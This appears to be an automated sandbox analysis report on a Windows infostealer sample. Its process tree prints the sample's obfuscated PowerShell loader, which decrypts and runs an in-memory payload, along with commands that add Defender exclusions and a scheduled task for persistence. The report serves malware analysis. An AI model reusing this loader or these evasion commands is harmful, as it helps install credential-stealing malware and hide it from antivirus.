f8a021222ad2ca32a7b3562f643d95401efca4ccd44c814f6107a0c828bee235

Analysis

max time kernel
146s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
26/05/2023, 05:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

508KB
MD5

3d8e55da456380fb8a608f177bfa32f4
SHA1

099ae11a503b6aa026ccce9960327ce162511c4f
SHA256

f8a021222ad2ca32a7b3562f643d95401efca4ccd44c814f6107a0c828bee235
SHA512

7baba73e810c20b9b44a123504da97d47a8ae65f477bd610efa2d9dca88682ebc5dc62ee61b2106f83cef09c1a2f77c7ad6d35cb99b34002ebe51e9962d2f638
SSDEEP

6144:lgZiAEAO0sByNsAal3gVAWgS7/OhwjKz1Jo7KBGHjaMI6zPQE:lgZXEAO/BUdG3gVdt7Kjz1JPkDaMbN

Score

7^/10

spyware stealer

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	Services64.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	file.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Services64.lnk	Services64.bat.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Services64.lnk	Services64.bat.exe

Executes dropped EXE 3 IoCs

pid	Process
1068	Services64.bat.exe
4200	Services64.bat.exe
1288	Services64.bat.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3820	schtasks.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee404000000010000001000000091de0625abdafd32170cbb25172a846720000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	Services64.bat.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 5c00000001000000040000000008000004000000010000001000000091de0625abdafd32170cbb25172a84670300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877619000000010000001000000063664b080559a094d10f0a3c5f4f629020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	Services64.bat.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	Services64.bat.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	Services64.bat.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 04000000010000001000000091de0625abdafd32170cbb25172a84670300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	Services64.bat.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1068	Services64.bat.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1068	Services64.bat.exe
1068	Services64.bat.exe
2044	powershell.exe
2044	powershell.exe
212	powershell.exe
212	powershell.exe
1088	powershell.exe
1088	powershell.exe
1068	Services64.bat.exe
4200	Services64.bat.exe
4200	Services64.bat.exe
1288	Services64.bat.exe
1288	Services64.bat.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1068	Services64.bat.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	212	powershell.exe
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	4200	Services64.bat.exe
Token: SeDebugPrivilege	1288	Services64.bat.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1068	Services64.bat.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 4108 wrote to memory of 3484	4108	file.exe	76
PID 4108 wrote to memory of 3484	4108	file.exe	76
PID 4108 wrote to memory of 3484	4108	file.exe	76
PID 3484 wrote to memory of 1068	3484	cmd.exe	79
PID 3484 wrote to memory of 1068	3484	cmd.exe	79
PID 3484 wrote to memory of 1068	3484	cmd.exe	79
PID 1068 wrote to memory of 2044	1068	Services64.bat.exe	90
PID 1068 wrote to memory of 2044	1068	Services64.bat.exe	90
PID 1068 wrote to memory of 2044	1068	Services64.bat.exe	90
PID 1068 wrote to memory of 212	1068	Services64.bat.exe	92
PID 1068 wrote to memory of 212	1068	Services64.bat.exe	92
PID 1068 wrote to memory of 212	1068	Services64.bat.exe	92
PID 1068 wrote to memory of 1088	1068	Services64.bat.exe	95
PID 1068 wrote to memory of 1088	1068	Services64.bat.exe	95
PID 1068 wrote to memory of 1088	1068	Services64.bat.exe	95
PID 1068 wrote to memory of 3820	1068	Services64.bat.exe	97
PID 1068 wrote to memory of 3820	1068	Services64.bat.exe	97
PID 1068 wrote to memory of 3820	1068	Services64.bat.exe	97
PID 4532 wrote to memory of 4200	4532	cmd.exe	102
PID 4532 wrote to memory of 4200	4532	cmd.exe	102
PID 4772 wrote to memory of 1288	4772	cmd.exe	105
PID 4772 wrote to memory of 1288	4772	cmd.exe	105

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3484
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat.exe
    "Services64.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_XoNYx = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat').Split([Environment]::NewLine);foreach ($_CASH_JmiKu in $_CASH_XoNYx) { if ($_CASH_JmiKu.StartsWith(':: @')) { $_CASH_pEcwm = $_CASH_JmiKu.Substring(4); break; }; };$_CASH_pEcwm = [System.Text.RegularExpressions.Regex]::Replace($_CASH_pEcwm, '_CASH_', '');$_CASH_hcrkM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_pEcwm);$_CASH_NmnGY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V674PRScmmHDDJLWVhq6egNrAg2NiglLrOeQ3AuEMAI=');for ($i = 0; $i -le $_CASH_hcrkM.Length - 1; $i++) { $_CASH_hcrkM[$i] = ($_CASH_hcrkM[$i] -bxor $_CASH_NmnGY[$i % $_CASH_NmnGY.Length]); };$_CASH_CmTge = New-Object System.IO.MemoryStream(, $_CASH_hcrkM);$_CASH_hXKYV = New-Object System.IO.MemoryStream;$_CASH_yZXbk = New-Object System.IO.Compression.GZipStream($_CASH_CmTge, [IO.Compression.CompressionMode]::Decompress);$_CASH_yZXbk.CopyTo($_CASH_hXKYV);$_CASH_yZXbk.Dispose();$_CASH_CmTge.Dispose();$_CASH_hXKYV.Dispose();$_CASH_hcrkM = $_CASH_hXKYV.ToArray();$_CASH_pEfZi = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_hcrkM);$_CASH_Auehj = $_CASH_pEfZi.EntryPoint;$_CASH_Auehj.Invoke($null, (, [string[]] ('')))
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1068
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2044
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Services64.bat'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:212
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Services64.bat'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1088
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Services64" /tr "C:\Users\Admin\AppData\Local\Temp\Services64.bat"
      4⤵
      Creates scheduled task(s)
      PID:3820

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Services64.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4532
- C:\Users\Admin\AppData\Local\Temp\Services64.bat.exe
  "Services64.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_XoNYx = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Services64.bat').Split([Environment]::NewLine);foreach ($_CASH_JmiKu in $_CASH_XoNYx) { if ($_CASH_JmiKu.StartsWith(':: @')) { $_CASH_pEcwm = $_CASH_JmiKu.Substring(4); break; }; };$_CASH_pEcwm = [System.Text.RegularExpressions.Regex]::Replace($_CASH_pEcwm, '_CASH_', '');$_CASH_hcrkM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_pEcwm);$_CASH_NmnGY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V674PRScmmHDDJLWVhq6egNrAg2NiglLrOeQ3AuEMAI=');for ($i = 0; $i -le $_CASH_hcrkM.Length - 1; $i++) { $_CASH_hcrkM[$i] = ($_CASH_hcrkM[$i] -bxor $_CASH_NmnGY[$i % $_CASH_NmnGY.Length]); };$_CASH_CmTge = New-Object System.IO.MemoryStream(, $_CASH_hcrkM);$_CASH_hXKYV = New-Object System.IO.MemoryStream;$_CASH_yZXbk = New-Object System.IO.Compression.GZipStream($_CASH_CmTge, [IO.Compression.CompressionMode]::Decompress);$_CASH_yZXbk.CopyTo($_CASH_hXKYV);$_CASH_yZXbk.Dispose();$_CASH_CmTge.Dispose();$_CASH_hXKYV.Dispose();$_CASH_hcrkM = $_CASH_hXKYV.ToArray();$_CASH_pEfZi = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_hcrkM);$_CASH_Auehj = $_CASH_pEfZi.EntryPoint;$_CASH_Auehj.Invoke($null, (, [string[]] ('')))
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4200

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Services64.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4772
- C:\Users\Admin\AppData\Local\Temp\Services64.bat.exe
  "Services64.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_XoNYx = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Services64.bat').Split([Environment]::NewLine);foreach ($_CASH_JmiKu in $_CASH_XoNYx) { if ($_CASH_JmiKu.StartsWith(':: @')) { $_CASH_pEcwm = $_CASH_JmiKu.Substring(4); break; }; };$_CASH_pEcwm = [System.Text.RegularExpressions.Regex]::Replace($_CASH_pEcwm, '_CASH_', '');$_CASH_hcrkM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_pEcwm);$_CASH_NmnGY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V674PRScmmHDDJLWVhq6egNrAg2NiglLrOeQ3AuEMAI=');for ($i = 0; $i -le $_CASH_hcrkM.Length - 1; $i++) { $_CASH_hcrkM[$i] = ($_CASH_hcrkM[$i] -bxor $_CASH_NmnGY[$i % $_CASH_NmnGY.Length]); };$_CASH_CmTge = New-Object System.IO.MemoryStream(, $_CASH_hcrkM);$_CASH_hXKYV = New-Object System.IO.MemoryStream;$_CASH_yZXbk = New-Object System.IO.Compression.GZipStream($_CASH_CmTge, [IO.Compression.CompressionMode]::Decompress);$_CASH_yZXbk.CopyTo($_CASH_hXKYV);$_CASH_yZXbk.Dispose();$_CASH_CmTge.Dispose();$_CASH_hXKYV.Dispose();$_CASH_hcrkM = $_CASH_hXKYV.ToArray();$_CASH_pEfZi = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_hcrkM);$_CASH_Auehj = $_CASH_pEfZi.EntryPoint;$_CASH_Auehj.Invoke($null, (, [string[]] ('')))
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1288

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Services64.bat.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
687ff3bb8a8b15736d686119a681097c

SHA1
18f43aa14e56d4fb158a8804f79fc3c604903991

SHA256
51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2

SHA512
047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
3ece125de15c25bf9b6483b192e07136

SHA1
5b8e91d08a0da8465ec13ed6894f42d97127cd82

SHA256
8844dbc47687790ff8208a7970b85200b2fa9974e257a0c730dc74ce098844af

SHA512
54b67c5e12194d8c2ef1c1dabaa3b3fb2b64c03beb3dfda610995cb3ac68336a310cb032236a97715dd72e8c7cd5a19c81cdc7623bec9f4bb14ae0a9c98a8d38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
47c253d54121394c5e6b911c655c9f00

SHA1
b0bec269e270f567b034b2b109b57b60dba0e351

SHA256
49613049247d0dabe57f17a39a4274ec4649924a109c69f63889ce5ef73a2560

SHA512
04b1889b4580e39e29d78edbe6d35daccdf5852c43dc9247abec3724ce079b6590d99709dd284b40686a43feb63d18a6f60996812e7a9d550450e27795885b54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
97831841d33dfe767fcf71a6a4c0f89c

SHA1
5432b06427191f70b4dd96eca1061cdec6306b64

SHA256
351601224ab41da7d692a583e3d1ba88f743b27df65d931907621226da606612

SHA512
f69d8cc437afa5b318092da8598fe5aa2f7e657b1f67f6e1645cbf7677ae958f1a651f4ee2f6ca3f9953f8a84e4be3eb13c89cacc2496f66249063477b10bdfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
84707f24324af70f9fcf4e096435b9dc

SHA1
426939fed288efdac05819cbe0de5a792416793e

SHA256
d667895b056a17249940bdef8a94849f57aec7ec0bc10a8f8f4d20a454e5b67b

SHA512
